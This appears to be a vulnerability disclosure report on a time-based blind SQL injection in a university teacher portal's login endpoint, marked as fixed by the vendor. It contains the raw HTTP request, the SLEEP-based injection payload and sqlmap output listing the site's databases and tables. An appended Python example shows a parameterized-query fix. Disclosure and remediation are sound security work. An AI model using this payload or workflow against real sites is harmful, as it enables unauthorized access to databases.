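2015-11-20: Details reported to the vendor; awaiting vendor handling
2015-11-23: Vendor confirmed; details disclosed to the vendor only
2015-11-23: Vendor fixed the vulnerability and disclosed it voluntarily; details released to the public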
As the title says.
POST /CheckLogin?rurl=null&set=login HTTP/1.1
Content-Length: 224
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://teacher.sicnu.edu.cn
Cookie: JSESSIONID=CF00B4FF8F87BC55D0B53B681E63E44C; CNZZDATA1000148100=1781699265-1447733262-http%253A%252F%252Fwww.acunetix-referrer.com%252F%7C1447733262
Host: teacher.sicnu.edu.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

md5=&user_bh=&user_gid=&user_id=*&user_lbm=&user_name=&user_nj=&user_role_list=&user_zcm=&user_zwm=
The user_id parameter is vulnerable to SQL injection.
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: md5=&user_bh=&user_gid=&user_id=' AND (SELECT * FROM (SELECT(SLEEP(5)))wTey) AND 'GAHY'='GAHY&user_lbm=&user_name=&user_nj=&user_role_list=&user_zcm=&user_zwm=
---
back-end DBMS: MySQL 5.0.12
available databases [3]:
[*] information_schema
[*] mysql
[*] sicnu_jssq
---
back-end DBMS: MySQL 5.0.12
Database: sicnu_jssq
[21 tables]
+--------------+
| comments     |
| counter      |
| course       |
| course_class |
| focus        |
| ip_control   |
| jzg          |
| jzg_announce |
| jzg_class    |
| link         |
| photo        |
| photo_class  |
| vote         |
| vote_class   |
| vote_content |
| wdc_class    |
| wdc_level    |
| wdc_log      |
| wdc_mail     |
| wdc_online   |
| wdc_sclass   |
+--------------+

Database: sicnu_jssq
+--------------+---------+
| Table        | Entries |
+--------------+---------+
| wdc_sclass   | 294     |
| course       | 281     |
| course_class | 95      |
| wdc_class    | 59      |
| counter      | 37      |
| jzg          | 37      |
| wdc_log      | 6       |
| photo        | 2       |
| photo_class  | 2       |
| vote         | 2       |
| vote_class   | 1       |
+--------------+---------+
Severity: Low
Vulnerability Rank: 5
Confirmed: 2015-11-23 10:34
Thanks for your support!
2015-11-23: Fixed. Thank you for your support!
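
The usual fix for an injection like the user_id one reported above is to bind the value to a placeholder instead of concatenating it into the SQL text. The sketch below is an added example, not code from the report or from the affected site; it uses Python's sqlite3 as a stand-in for the MySQL back end, and the users table, its columns and the sample row are hypothetical.

```python
import sqlite3

# Value of user_id copied from the sqlmap payload quoted in the report.
REPORTED_PAYLOAD = "' AND (SELECT * FROM (SELECT(SLEEP(5)))wTey) AND 'GAHY'='GAHY"


def make_db():
    """In-memory stand-in database; table and row are constructed samples."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id TEXT PRIMARY KEY, user_name TEXT)")
    conn.execute("INSERT INTO users VALUES ('t1001', 'Sample Teacher')")
    return conn


def lookup_concatenated(conn, user_id):
    """Vulnerable pattern: the request value becomes part of the SQL text."""
    sql = "SELECT user_name FROM users WHERE user_id = '" + user_id + "'"
    return conn.execute(sql).fetchone()


def lookup_parameterized(conn, user_id):
    """Hardened pattern: the value is bound to a placeholder, never parsed."""
    return conn.execute(
        "SELECT user_name FROM users WHERE user_id = ?", (user_id,)
    ).fetchone()


def reaches_sql_parser(lookup, conn, user_id):
    """True if the input was compiled as SQL. SQLite has no SLEEP(), so a
    payload that reaches the parser fails with 'no such function'; on the
    MySQL back end in the report the same text ran as a delay instead."""
    try:
        lookup(conn, user_id)
    except sqlite3.OperationalError as exc:
        return "no such function" in str(exc)
    return False


if __name__ == "__main__":
    db = make_db()
    print("concatenated :", reaches_sql_parser(lookup_concatenated, db, REPORTED_PAYLOAD))
    print("parameterized:", reaches_sql_parser(lookup_parameterized, db, REPORTED_PAYLOAD))
    print("normal lookup:", lookup_parameterized(db, "t1001"))
```

With the bound parameter, the reported string is compared as a literal user_id, matches no row, and the lookup returns nothing.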